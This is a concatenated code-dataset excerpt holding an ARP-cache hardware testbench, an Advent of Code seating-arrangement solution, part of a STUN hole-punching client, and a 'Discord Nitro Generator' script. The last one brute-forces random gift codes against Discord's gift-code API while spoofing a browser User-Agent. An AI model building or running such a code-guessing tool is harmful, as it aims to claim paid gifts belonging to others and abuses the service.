arp_response_error=arp_response_error,
arp_response_mac=arp_response_mac,
local_mac=local_mac,
local_ip=local_ip,
gateway_ip=gateway_ip,
subnet_mask=subnet_mask,
clear_cache=clear_cache
)
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
yield clk.posedge
local_mac.next = 0xDAD1D2D3D4D5
local_ip.next = 0xc0a80165
gateway_ip.next = 0xc0a80101
subnet_mask.next = 0xFFFFFF00
yield clk.posedge
print("test 1: ARP request")
current_test.next = 1
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xFFFFFFFFFFFF
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 1
test_frame.arp_sha = 0x5A5152535455
test_frame.arp_spa = 0xc0a80164
test_frame.arp_tha = 0x000000000000
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0x5A5152535455
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 2
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x5A5152535455
assert check_frame.arp_tpa == 0xc0a80164
yield delay(100)
yield clk.posedge
print("test 2: Cached read")
current_test.next = 2
arp_request_source.send([(0xc0a80164,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0x5A5152535455
yield delay(100)
yield clk.posedge
print("test 3: Unached read")
current_test.next = 3
arp_request_source.send([(0xc0a80166,)])
# wait for ARP request packet
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80166
# generate response
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x6A6162636465
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 2
test_frame.arp_sha = 0x6A6162636465
test_frame.arp_spa = 0xc0a80166
test_frame.arp_tha = 0xDAD1D2D3D4D5
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
# wait for lookup
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0x6A6162636465
yield delay(100)
yield clk.posedge
print("test 4: Unached read, outside of subnet")
current_test.next = 4
arp_request_source.send([(0x08080808,)])
# wait for ARP request packet
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80101
# generate response
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0xAABBCCDDEEFF
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 2
test_frame.arp_sha = 0xAABBCCDDEEFF
test_frame.arp_spa = 0xc0a80101
test_frame.arp_tha = 0xDAD1D2D3D4D5
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
# wait for lookup
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xAABBCCDDEEFF
yield delay(100)
yield clk.posedge
print("test 5: Unached read, timeout")
current_test.next = 5
arp_request_source.send([(0xc0a80167,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert err
# check for 4 ARP requests
assert eth_sink.count() == 4
while not eth_sink.empty():
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80167
yield delay(100)
yield clk.posedge
print("test 6: Broadcast")
current_test.next = 6
# subnet broadcast
arp_request_source.send([(0xc0a801ff,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xffffffffffff
# general broadcast
arp_request_source.send([(0xffffffff,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xffffffffffff
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench() | en | 0.765828 | #!/usr/bin/env python Copyright (c) 2014-2018 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Inputs # Outputs # sources and sinks # DUT # wait for ARP request packet # generate response # wait for lookup # wait for ARP request packet # generate response # wait for lookup # check for 4 ARP requests # subnet broadcast # general broadcast | 1.723785 | 2 |
NitroGenerator.py | ATRS7391/Discord_Nitro_Generator_And_Checker_Python_Version | 2 | 8549 | <reponame>ATRS7391/Discord_Nitro_Generator_And_Checker_Python_Version
import random
import sys
import subprocess
def pip_install(module: str):
subprocess.run([sys.executable, "-m", "pip", "-q", "--disable-pip-version-check", "install", module])
try:
import requests
except:
print("'requests' module not found! Trying to install... ")
pip_install("requests")
import requests
def print_header():
header = """
+-------------------------+
| Discord Nitro Generator |
+-------------------------+
Note: For Educational Purposes Only
© ATRS 2021. All Rights Reserved.
"""
print(header)
def get_code(nitro_type: str):
characters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u',
'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'A', 'B', 'C', 'D', 'E',
'F',
'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
if nitro_type == "Boost":
return str("".join([random.choice(characters) for char in range(24)]))
elif nitro_type == "Classic":
return str("".join([random.choice(characters) for char in range(16)]))
def check_code(nitro_code: str):
try:
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Encoding': 'none',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive'}
check_url = f"https://discordapp.com/api/v6/entitlements/gift-codes/{nitro_code}?with_application=false&with_subscription_plan=true"
status = requests.get(url=check_url, headers=headers).status_code
if status == 200:
return "True"
elif status == 429:
return "None"
else:
return "False"
except:
print("Something went wrong while checking urls. Press any key to exit. ")
input()
quit()
def get_nitro_type():
print("Enter what type of Discord Nitro you want to generate: \n\t1. Boost\n\t2. Classic")
user_response = input("> ")
if user_response.replace(" ", "").strip().lower() == "boost" or user_response.replace(" ",
"").strip().lower() == "1":
return "Boost"
elif user_response.replace(" ", "").strip().lower() == "classic" or user_response.replace(" ",
"").strip().lower() == "2":
return "Classic"
else:
print("Not a valid input. Press any key to exit. ")
input()
quit()
print_header()
user_nitro_type = get_nitro_type()
print("Enter the number of Nitro Codes you want: ")
amount = int(input("> "))
valid_codes = 0
invalid_codes = 0
unchecked_codes = 0
print()
print()
f = open("All_Nitro_Codes.txt", "w", encoding='utf-8')
for i in range(amount):
user_nitro_code = get_code(nitro_type=user_nitro_type)
validity = check_code(nitro_code=user_nitro_code)
if validity == "True":
display = f"Valid. | https://discord.com/gifts/{user_nitro_code}"
valid_codes += 1
print(display)
f.writelines(display + "\n")
elif validity == "False":
display = f"Invalid. | https://discord.com/gifts/{user_nitro_code}"
invalid_codes += 1
print(display)
f.writelines(display + "\n")
elif validity == "None":
display = f"Unchecked. Rate limited. | https://discord.com/gifts/{user_nitro_code}"
unchecked_codes += 1
print(display)
f.writelines(display + "\n")
print("\n\nSuccessfully generated Nitro Codes. ")
print("Valid Nitro Codes: " + str(valid_codes))
print("Invalid Nitro Codes: " + str(invalid_codes))
print("Unchecked Nitro Codes: " + str(unchecked_codes))
print("\nEnter any key to exit.")
input()
quit()
| import random
import sys
import subprocess
def pip_install(module: str):
subprocess.run([sys.executable, "-m", "pip", "-q", "--disable-pip-version-check", "install", module])
try:
import requests
except:
print("'requests' module not found! Trying to install... ")
pip_install("requests")
import requests
def print_header():
header = """
+-------------------------+
| Discord Nitro Generator |
+-------------------------+
Note: For Educational Purposes Only
© ATRS 2021. All Rights Reserved.
"""
print(header)
def get_code(nitro_type: str):
characters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u',
'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'A', 'B', 'C', 'D', 'E',
'F',
'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
if nitro_type == "Boost":
return str("".join([random.choice(characters) for char in range(24)]))
elif nitro_type == "Classic":
return str("".join([random.choice(characters) for char in range(16)]))
def check_code(nitro_code: str):
try:
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Encoding': 'none',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive'}
check_url = f"https://discordapp.com/api/v6/entitlements/gift-codes/{nitro_code}?with_application=false&with_subscription_plan=true"
status = requests.get(url=check_url, headers=headers).status_code
if status == 200:
return "True"
elif status == 429:
return "None"
else:
return "False"
except:
print("Something went wrong while checking urls. Press any key to exit. ")
input()
quit()
def get_nitro_type():
print("Enter what type of Discord Nitro you want to generate: \n\t1. Boost\n\t2. Classic")
user_response = input("> ")
if user_response.replace(" ", "").strip().lower() == "boost" or user_response.replace(" ",
"").strip().lower() == "1":
return "Boost"
elif user_response.replace(" ", "").strip().lower() == "classic" or user_response.replace(" ",
"").strip().lower() == "2":
return "Classic"
else:
print("Not a valid input. Press any key to exit. ")
input()
quit()
print_header()
user_nitro_type = get_nitro_type()
print("Enter the number of Nitro Codes you want: ")
amount = int(input("> "))
valid_codes = 0
invalid_codes = 0
unchecked_codes = 0
print()
print()
f = open("All_Nitro_Codes.txt", "w", encoding='utf-8')
for i in range(amount):
user_nitro_code = get_code(nitro_type=user_nitro_type)
validity = check_code(nitro_code=user_nitro_code)
if validity == "True":
display = f"Valid. | https://discord.com/gifts/{user_nitro_code}"
valid_codes += 1
print(display)
f.writelines(display + "\n")
elif validity == "False":
display = f"Invalid. | https://discord.com/gifts/{user_nitro_code}"
invalid_codes += 1
print(display)
f.writelines(display + "\n")
elif validity == "None":
display = f"Unchecked. Rate limited. | https://discord.com/gifts/{user_nitro_code}"
unchecked_codes += 1
print(display)
f.writelines(display + "\n")
print("\n\nSuccessfully generated Nitro Codes. ")
print("Valid Nitro Codes: " + str(valid_codes))
print("Invalid Nitro Codes: " + str(invalid_codes))
print("Unchecked Nitro Codes: " + str(unchecked_codes))
print("\nEnter any key to exit.")
input()
quit() | en | 0.545561 | +-------------------------+
| Discord Nitro Generator |
+-------------------------+
Note: For Educational Purposes Only
© ATRS 2021. All Rights Reserved. | 2.600834 | 3 |
2015/main/13/part2.py | sgravrock/adventofcode | 0 | 8550 | <filename>2015/main/13/part2.py
import sys
import itertools
def readfile(f):
result = {}
for line in f:
fields = line.rstrip().split(" ")
p1 = fields[0]
p2 = fields[10].replace(".", "")
n = int(fields[3])
if fields[2] == "lose":
n *= -1
result[(p1, p2)] = n
return result
def optimal(config):
add_self(config)
diners = set([k[0] for k in config.keys()])
arrangements = list(itertools.permutations(diners))
all = [(arr, happiness(config, arr)) for arr in arrangements]
return max(all, key=lambda p: p[1])
def happiness(config, arrangement):
return sum([happiness_for_pair(config, p) for p in makepairs(arrangement)])
def happiness_for_pair(config, pair):
opposite = (pair[1], pair[0])
return config[pair] + config[opposite]
def add_self(config):
for d in set([k[0] for k in config.keys()]):
config[(d, "self")] = 0
config[("self", d)] = 0
def makepairs(arr):
n = len(arr)
for i in xrange(1, n):
yield (arr[i-1], arr[i])
yield (arr[n-1], arr[0])
if __name__ == "__main__":
print optimal(readfile(sys.stdin))
| <filename>2015/main/13/part2.py
import sys
import itertools
def readfile(f):
result = {}
for line in f:
fields = line.rstrip().split(" ")
p1 = fields[0]
p2 = fields[10].replace(".", "")
n = int(fields[3])
if fields[2] == "lose":
n *= -1
result[(p1, p2)] = n
return result
def optimal(config):
add_self(config)
diners = set([k[0] for k in config.keys()])
arrangements = list(itertools.permutations(diners))
all = [(arr, happiness(config, arr)) for arr in arrangements]
return max(all, key=lambda p: p[1])
def happiness(config, arrangement):
return sum([happiness_for_pair(config, p) for p in makepairs(arrangement)])
def happiness_for_pair(config, pair):
opposite = (pair[1], pair[0])
return config[pair] + config[opposite]
def add_self(config):
for d in set([k[0] for k in config.keys()]):
config[(d, "self")] = 0
config[("self", d)] = 0
def makepairs(arr):
n = len(arr)
for i in xrange(1, n):
yield (arr[i-1], arr[i])
yield (arr[n-1], arr[0])
if __name__ == "__main__":
print optimal(readfile(sys.stdin))
| none | 1 | 3.35208 | 3 |
|
networking/connection/stun_client.py | bcgrendel/python_networking | 0 | 8551 | <reponame>bcgrendel/python_networking
import socket
import sys
import traceback
import struct
import threading;
from threading import Thread;
import time;
import datetime;
import json
#import buffered_message;
import hashlib
from Crypto.PublicKey import RSA
from connection_state import ConnectionState
# publickey = RSA.importKey(key_string)
import tcp;
import udp;
# *************
# EXAMPLE USAGE
# *************
'''
import socket
import tcp
import udp
import stun_client
import time
start_listening = True
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 30779
server_ip = socket.gethostbyname(socket.gethostname())
server_port = 30788
socket_timeout = 3.0
peer_block_manager = None
client = stun_client.STUN_Client(start_listening, local_ip, local_port, server_ip, server_port, socket_timeout, peer_block_manager)
# Set your available listening port ranges
client.available_ports = [[35000, 35100], [36500, 36700],]
# Register a user acccount with the stun server.
class RegisterCallback:
def __init__(self):
self.error_message = ""
self.success = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Registration request to server has timed-out."
def complete_registration(self, success, error_message=""):
self.success = success
self.error_message = error_message
username = "test_user"
password = "<PASSWORD>"
profile_map = {}
callback_object = RegisterCallback()
registration_type = "permanent"
client.register(username, password, profile_map, callback_object, registration_type)
response_check_interval = 0.5;
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
# Login with username and password.
class AuthCallback:
def __init__(self):
self.error_message = ""
self.success = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Authentication request to server has timed-out."
def complete_authentication(self, success, error_message=""):
self.success = success
self.error_message = error_message
callback_object = AuthCallback()
login = True # this authentication is to login. It'd be False if we wanted to log out.
client.authenticate(username, password, callback_object, login)
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
# Now we can access the list of peers connected to the server.
# Alternatively, assign a function reference to client.peer_map_callback (argument will be a reference to client.peer_map) to be notified of peer list updates as they are received.
#
# sample peer_map:
# ["test_user":["test_user", None], "another_user":["another_user", None],]
# Get a peer from the list.
peer_username = None;
for _username, data in client.peer_map.iteritems():
if username != _username:
peer_username = _username
break
# Connect to that peer (hole-punch)
class ConnectionCallback:
def __init__(self):
self.error_message = ""
self.success = None
self.client_key = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Connection request to server has timed-out."
def complete_connection(self, peer_username, success, error_message=""):
self.success = success
if success:
self.client_key = error_message
else:
self.error_message = error_message
buffer_size = 128
callback_object = ConnectionCallback()
client.connect_to_peer(peer_username, buffer_size, callback_object)
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
client_key = callback_object.client_key
udp_client = client.client_map[client_key]
# Now you can communicate with that peer.
udp_client.send_message("Greetings!")
udp_client.pop_all_messages()
'''
class STUN_Client:
def __init__(self,
start_listen_thread=False,
local_ip=socket.gethostbyname(socket.gethostname()),
local_port=30779,
server_ip=socket.gethostbyname(socket.gethostname()),
server_port=30788,
socket_timeout=3.0,
peer_block_manager=None):
self.local_ip = local_ip;
self.local_port = local_port;
self.socket_timeout = socket_timeout;
self.peer_block_manager = peer_block_manager;
self.thread_sleep_duration = 0.1;
self.error_log = [];
self.username = None;
self.password = <PASSWORD>;
self.profile_map = {};
self.authenticated = False;
self.auth_callback = None;
self.auth_keys = None;
self.auth_timeout = 15; # 15 seconds is the limit for authentication requests. It's just a magic number like many of these timeout values.
self.last_auth = None;
self.login_expiration = 20; # login will expire after this many seconds passes without successful keep-alive authentication
self.auth_keep_alive_interval = 5;
self.auth_keep_alive_multiplier = 1; # Avoid hammering the server if it's down. Will increment every time re-auth fails, returns to 1 upon successful authentication.
self.re_auth_ready = None;
self.master_log = []; # all messages recieved
self.message_log_map = {}; # log per message type.
# this will handle callbacks for keeping track of whether the user's authentication expires (namely from losing connection to the server.)
self.authentication_monitor_object = None;
self.hole_punch_timeout = 20;
self.hole_punch_max_attempts = 20;
self.server_response_timeout = 20;
# Server response flags. Set to None when sending a request; they are flipped to True upon receiving a response. Used for determining response time-out.
self._auth_status = None;
self._registration_status = None; # Private. Internal use only.
self._holepunch_status = {};
self.available_ports = [[34000, 34100],] # list of ranges, e.g. ports 34000 - 34100
self.used_ports = [];
self.registration_key = None;
self.udp_client_keep_alive_timeout = 30;
# dictionary of active udp connections (hole-punched)
self.client_map = {};
self.callback_map = {};
self.send_queue = [];
self.connection_state = ConnectionState(False);
# Initialize TCP client.
self.init_tcp_client(server_ip, server_port);
self.peer_map = {};
# Start listening to the stun server.
self.init_stun_listener();
self.keep_alive_monitor = KeepAliveMonitor(self);
self.peer_map_callback = None;
def shutdown(self, stun_only=True):
self.authenticated = False;
self.connection_state.active = False; # kills main thread, making the logout auth sequence impossible in its current implementation (get salt/key, then perform request) which needs the main loop.
self.stun_client.disconnect();
if not stun_only:
# disconnect all udp clients...
for key, client in self.client_map.iteritems():
client.disconnect();
self.client_map.clear();
self.peer_map.clear();
del self.used_ports[:]
def restart(self, stun_only=True):
self.shutdown(stun_only);
self.init_tcp_client(self.server_ip, self.server_port);
self.init_stun_listener();
def log_error(self, error_message, extra=None):
err_msg = "[STUN_Server] Line #%s: %s\n\n%s" % (str(traceback.tb_lineno(sys.exc_traceback)), traceback.format_exc(), sys.exc_info());
timestamp = time.time();
date_string = datetime.datetime.fromtimestamp(timestamp).strftime('(%Y-%m-%d) %H:%M:%S')
self.error_log.append((timestamp, date_string, err_msg, extra));
def monitor_response(self, target_object, target_key=None, timeout=20, callback=None, callback_params=None, timeout_callback=None, timeout_callback_params=None):
"""Waits until target is no longer null or timeout occurs. Timeout is in seconds. target_object and target_key should be strings.
If target key is not null, then target_object will be treated as a dictionary (using target_key for the index).
This function is best utilized on its own separate thread."""
# Wait until salt and key have been retrieved or timeout occurs.
time_elapsed = 0;
start_time = time.time();
target_attribute = getattr(self, target_object);
target = None;
connection_state = self.connection_state
#print "Monitoring for %s" % target_object;
# Behold, python lambda expressions in the wild!
if target_key == None:
target = lambda parent: getattr(parent, target_object);
else:
target = lambda parent: getattr(parent, target_object)[target_key];
while time_elapsed < timeout:
time_elapsed = time.time() - start_time;
# check for shutdown.
if not connection_state.active:
return;
# check for target condition
if target(self) != None:
break;
time.sleep(self.thread_sleep_duration);
# Check for timeout.
if target(self) == None:
#print "Timeout on %s" % target_object;
has_timeout_callback = timeout_callback != None;
if has_timeout_callback:
if timeout_callback_params != None:
timeout_callback(timeout_callback_params);
else:
timeout_callback();
return;
#else:
# print "No timeout on %s" % target_object;
# Success, run the callback if one was provided (maybe not if one is only concerned with the timeout event).
if callback != None:
if callback_params != None:
callback(target_object, target_key, callback_params);
else:
callback(target_object, target_key);
def authenticate_thread(self, username, password, callback_object=None, login=True):
# callback_object should have a complete_authentication(success, error_message) method.
self.username = username;
self.password = password;
self.auth_callback = callback_object;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Send salt and dynamic key retrieval request.
self.auth_keys = None;
message = "auth_salt_request %s" % username;
if not self.stun_send_message(message):
#callback_object.complete_authentication(False, "Failed to connect to the server.");
if timeout_handler != None:
timeout_handler("Failed to connect to the server.");
return;
# Wait until salt and key have been retrieved or timeout occurs.
self.monitor_response("auth_keys", None, self.server_response_timeout, self.authenticate_send_credentials, [login, callback_object], timeout_handler, "Server failed to respond.");
def authenticate_send_credentials(self, target_object=None, target_key=None, params=None):
callback_object = None;
if params != None:
callback_object = params[1];
login = params[0]
# hash the password
salt, dynamic_key = self.auth_keys;
if not salt:
if callback_object != None:
callback_object.complete_authentication(False, "Failed to connect to the server.");
return;
salted_password = <PASSWORD>" % (salt, self.password)
hashed_salted_password = hashlib.<PASSWORD>4(<PASSWORD>).hex<PASSWORD>();
#print "hash1: %s\n" % hashed_salted_password;
key_and_hash = "%s%s" % (dynamic_key, hashed_salted_password)
hashed_password = <PASSWORD>(key_and_hash).<PASSWORD>();
#print "hash2: %s" % hashed_password;
self._auth_status = None;
# Send authentication request.
message = "authenticate %s" % json.dumps([self.username, hashed_password, login, json.dumps(self.available_ports), json.dumps(self.used_ports)]);
if not self.stun_send_message(message):
if callback_object != None:
callback_object.complete_authentication(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
self.monitor_response("_auth_status", None, self.server_response_timeout, None, None, timeout_handler);
def registration_completion_handler(self, target_object, target_key, params):
callback_object = params;
registration_handler = None;
has_registration_handler = ((callback_object != None) and (hasattr(callback_object, "complete_registration")))
if has_registration_handler:
callback_object.complete_registration(True, "");
def send_encrypted_registration_request(self, target_object=None, target_key=None, params=None):
username, password, profile_map, callback_object, registration_type = params;
self._registration_status = None;
# Construct the message.
message = "%s" % json.dumps([username, password, profile_map, registration_type]);
# Encrypt the message.
public_key = RSA.importKey(self.registration_key)
message = public_key.encrypt(message, 32);
# Tack on the username in plain text and json_encode again. The STUN Server needs to username to determine which private key to use to decrypt the message.
message = "register %s %s" % (username, message[0]);
if not self.stun_send_message(message):
callback_object.complete_registration(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Wait until salt and key have been retrieved or timeout occurs.
self.monitor_response("_registration_status", None, self.server_response_timeout, self.registration_completion_handler, callback_object, timeout_handler);
def register_thread(self, username, password, profile_map, callback_object=None, registration_type="permanent"):
# callback_object should have a complete_registration(success, error_message) method.
self.username = username;
self.password = password;
self.profile_map = profile_map;
self.register_callback = callback_object;
self.registration_key = None;
message = "register_key %s" % username;
if not self.stun_send_message(message):
callback_object.complete_registration(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
params = [username, password, profile_map, callback_object, registration_type];
self.monitor_response("registration_key", None, self.server_response_timeout, self.send_encrypted_registration_request, params, timeout_handler);
def authenticate(self, username, password, callback_object=None, login=True):
"""Non-blocking. Sends a user authentication request."""
# Spawn a separate thread to perform authentication. This is to keep from blocking the caller, since a callback is expected to handle results.
Thread(target=self.authenticate_thread, args=(username, password, callback_object, login)).start();
def maintain_authentication(self, callback_object=None):
#self.authentication_monitor_object
username = self.username
password = <PASSWORD>
last_auth = self.last_auth
self.re_auth_ready = True;
while self.authenticated:
last_reauth = self.keep_alive_monitor.last_reauth_attempt;
now = time.time();
ready_time = last_reauth + (self.auth_keep_alive_multiplier * self.auth_keep_alive_interval);
time_for_another_reauth_attempt = now >= ready_time;
# By re_auth_ready, I'm saying a re-authentication attempt isn't currently in progress. Yes, it's a poorly named variable.
# I'll need to rename it something better. Maybe later (trademark).
if self.re_auth_ready and time_for_another_reauth_attempt:
self.re_auth_ready = False;
self.authenticate(self.username, self.password, self.keep_alive_monitor);
time.sleep(self.thread_sleep_duration);
def logout(self):
self.authenticated = False;
self.authenticate(self.username, self.password, self.keep_alive_monitor, False);
def register(self, username, password, profile_map, callback_object=None, registration_type="permanent"):
"""Non-blocking. Sends a user registration request.
Only type of registration available for now is 'permanent'. Temporary to come later, maybe (for guests/'unregistered' users).
Note that profile_map should be a json-encoded string (you can store arbitrary data here)."""
# Spawn a separate thread to perform registration. This is to keep from blocking the caller, since a callback is expected to handle results.
Thread(target=self.register_thread, args=(username, password, profile_map, callback_object, registration_type)).start();
def init_tcp_client(self, server_ip, server_port, buffer_size=1024):
self.server_ip = server_ip;
self.server_port = server_port;
self.stun_client = tcp.TCP_Client(server_ip, server_port, buffer_size);
def init_stun_listener(self):
self.connection_state = ConnectionState(True);
Thread(target=self.stun_listen_loop).start();
def stun_send_message(self, message, json_encode=False, prepare=True):
try:
self.stun_client.send_message(message, json_encode, prepare);
return True;
except:
return False;
def stun_listen_loop(self):
connection_state = self.connection_state
message_object = None
while self.connection_state.active:
try:
message_object = self.stun_client.pop_message();
is_valid_message = ((message_object != None) and (len(message_object) > 2));
self.master_log.append(message_object);
if is_valid_message:
message = message_object[2];
message_type, message_body = message.split(" ",1);
if message_type not in self.message_log_map:
self.message_log_map[message_type] = [];
self.message_log_map[message_type].append(message_object);
#print "MESSAGE: %s\n" % message_object;
if(message_type == "peer_map"):
# peer data should be [[peer_username, public_profile_map], ...]
message_data = json.loads(message_body);
self.update_peer_map(message_data);
if self.peer_map_callback != None:
self.peer_map_callback(self.peer_map);
elif(message_type == "hole_punch"):
peer_allowed = True;
# message body should be [listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size]
message_data = json.loads(message_body);
listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size = message_data
port_in_use = False;
# Ensure port isn't already in use.
if listen_port in self.used_ports:
port_in_use = True;
self.stun_send_message("hole_punch_reject %s" % json.dumps([listen_ip, listen_port, self.username, peer_ip, peer_port, peer_username, buffer_size, port_in_use]));
continue;
message_body = json.dumps([listen_ip, listen_port, self.username, peer_ip, peer_port, peer_username, buffer_size, port_in_use]);
if(self.peer_block_manager != None):
peer_allowed = self.peer_block_manager.is_peer_allowed(message_data);
if(peer_allowed):
self.stun_send_message("hole_punch_ack %s" % message_body);
else:
